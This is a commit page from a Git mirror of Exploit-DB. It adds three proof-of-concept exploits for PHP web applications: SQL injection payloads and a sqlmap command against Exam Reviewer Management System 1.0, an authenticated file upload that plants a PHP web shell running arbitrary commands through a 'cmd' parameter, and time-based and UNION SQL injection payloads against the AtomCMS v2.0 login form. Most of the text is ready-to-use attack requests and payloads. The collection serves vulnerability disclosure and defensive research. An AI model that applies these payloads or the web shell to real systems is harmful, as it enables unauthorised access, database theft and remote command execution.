bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-02-10

Browse source 
3 changes to exploits/shellcodes

Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
AtomCMS v2.0 - SQLi
This commit is contained in:
Offensive Security 2022-02-10 05:02:00 +00:00
parent 41553c4004
commit c86e2ee727
4 changed files with 271 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

64
exploits/php/webapps/50725.txt Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: Exam Reviewer Management System 1.0 - id SQL Injection
# Date: 2022-02-18
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage:
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Description The id parameter in Exam Reviewer Management System web
application is vulnerable to SQL Injection
Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
POC:-
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (FLOOR)
Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
COUNT(*),CONCAT(0x71766a7071,(SELECT
(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
AND 'vqGg'='vqGg---
*SQLMAP COMMAND*
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*

144
exploits/php/webapps/50726.txt Normal file
View file

@ -0,0 +1,144 @@
# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-02-08
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage:
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: XAMPP, Kali Linux
Description The application suffers from a remote code execution in the
admin panel. An authenticated attacker can upload a web-shell php file in
profile page to achieve remote code execution.
POC:-
==========
# Request:
==========
POST /erms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------37791356766765055891341961306
Content-Length: 1004
Origin: http://localhost
Connection: close
Referer: http://localhost/erms/admin/?page=user
Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="id"
1
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="firstname"
Adminstrator
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="lastname"
Admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="username"
admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="password"
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<b>Remote code execution: </b><br><pre>
<?php if(isset($_REQUEST['cmd'])){ echo
"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
</pre>
</body>
</html>
-----------------------------37791356766765055891341961306—
================
# Webshell access:
================
# Webshell access via:
POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
# Webshell response:
Remote code execution:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

60
exploits/php/webapps/50727.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: AtomCMS v2.0 - SQLi
# Date: 08/02/2022
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Version: v2.0
# Category: Webapps
# Tested on: Debian linux
# CVE : CVE-2022-24223
====================================================
# PoC : SQLi :
http://127.0.0.1/Atom.CMS/admin/login.php
POST /Atom.CMS/admin/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/Atom.CMS/admin/login.php
Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
email=test%40test.com&password=1234
Vulnerable Payload :
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=test@test.com' AND (SELECT 5613 FROM
(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234
Vector: AND (SELECT [RANDNUM] FROM
(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: email=test@test.com' UNION ALL SELECT
NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--
-&password=1234
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -
---
====================================================

3
files_exploits.csv
View file

@ -44799,3 +44799,6 @@ id,file,description,date,author,type,platform,port
50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php, 50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php, 50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php, 50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - id SQL Injection",1970-01-01,"Juli Agarwal",webapps,php,
50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php,
50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,

Can't render this file because it is too large.